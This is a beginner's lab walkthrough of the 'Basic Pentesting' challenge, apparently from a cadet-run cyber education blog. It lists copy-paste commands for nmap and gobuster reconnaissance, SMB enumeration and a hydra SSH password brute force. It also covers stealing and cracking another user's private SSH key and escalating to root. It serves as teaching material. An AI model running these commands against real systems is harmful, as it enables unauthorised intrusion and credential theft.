Basic Pentesting

Command-Argument structure

Interacting with a Linux system is simple: Everything you type is either a command or an argument.

cat will print out the contents of the hello.txt file
ls, using the -a, shows all (including hidden) contents of the /home/user directory

Hacker Commands

The following list are all the commands you will need to hack the computer. Feel free to copy and paste your way to victory!

#Conduct your initial Recon with nmap
nmap <IP Address>
nmap -sV <IP Address> -p<ports>
#Find hidden directories with gobuster
gobuster dir -u <IP Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
#Conduct additional reconnaissance on the Samba service
~/Desktop/Tools/Miscellaneous/enum4linux <IP Address>
#Bruteforce the SSH password (-l is the lowercase letter L)
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP Address> ssh -V
#Login to the computer using ssh
ssh <username>@<IP Address>
#Find vectors to conduct privilege escalation
whoami
sudo -l
find / -perm /4000 2>/dev/null
scp /opt/PEAS/linPEAS/linpeas.sh <username>@<IP Address>:/tmp
chmod +x /tmp/linpeas.sh
./linpeas.sh > /tmp/vulnerabilities.txt
cat /home/<user>/.ssh/id_rsa
#Crack the ssh
scp <username>@<IP Address>:/home/<user>/.ssh/id_rsa . && chmod 600 id_rsa
/opt/john/ssh2john.py
chmod +x ssh2.john.py
ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa <user>@<IP Address>
#Get root access
cat passwords.bak
sudo -l
sudo su
cat /root/root.txt

Step 1 — Recon

When it comes to pentesting, you always start with gathering intelligence. In our case, we want to know what ways we can access the computer associated with the IP address we are given.

nmap <IP Address>
nmap -sV <IP Address> -p<ports>
nmap scan
nmap version scan

Step 2 — Attacking HTTP

From our scan, we can see there are a couple open. Everybody should know port 80, the port used to serve a website. That means, we can browse the the website with Firefox or Chrome.

Results of the website
gobuster dir -u <IP Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Using gobuster
  • A hint about SMB (another service) perhaps
  • Weak passwords in /etc/shadow(a linux file that contains passwords) →Password cracking?

Step 3— Attacking SMB

Since the hints mentioned SMB, let’s take a look at that. If you refer to the nmap scan we did earlier…

139 and 445 happen to be SMB servers
~/Desktop/Tools/Miscellaneous/enum4linux <IP Address>
Some super interesting results from the enum4linux
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP Address> ssh -V

Resources

dirbuster checklist

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
West Point CyberTech

West Point CyberTech

Cadet run, Cyber education, Remote Interviews, Unofficial (Does not represents the views of USMA)